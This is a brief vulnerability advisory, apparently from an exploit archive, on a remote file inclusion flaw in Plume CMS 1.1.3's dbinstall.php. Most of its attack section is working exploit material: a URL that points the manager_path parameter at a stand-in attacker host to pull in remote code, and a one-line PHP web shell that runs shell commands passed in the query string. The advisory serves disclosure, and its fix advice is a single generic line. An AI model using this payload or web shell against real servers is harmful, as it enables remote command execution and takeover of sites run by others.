Plume CMS version 1.1.3 is susceptible to a remote file inclusion vulnerability.
dae5c339067cfd24b72b48787bf954e9f3d5ca9ffd2b1a167d8304c675e34904
The original article can be found at:
https://www.hamid.ir/security/
https://www.IHSteam.com
Vulnerable Systems:
Plume CMS 1.1.3
Vulnerable Code :
[path]/plume-1.1.3/plume/manager/tools/link/dbinstall.php //Vulnerable Code :line 39
require_once $_PX_config['manager_path'].'/inc/class.checklist.php';
require_once $_PX_config['manager_path'].'/extinc/class.xmlsql.php';
Exploits:
The following URL will cause the server to include external files
https://localhost/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls -al&_PX_config[manager_path]=https://attacker/cmd.gif?
cmd.gif
<?
passthru($_GET['cmd']);
?>
Solution:
Edit the source code to ensure that input is properly
verified.
greeting :
LorD , NT , C0d3r of IHS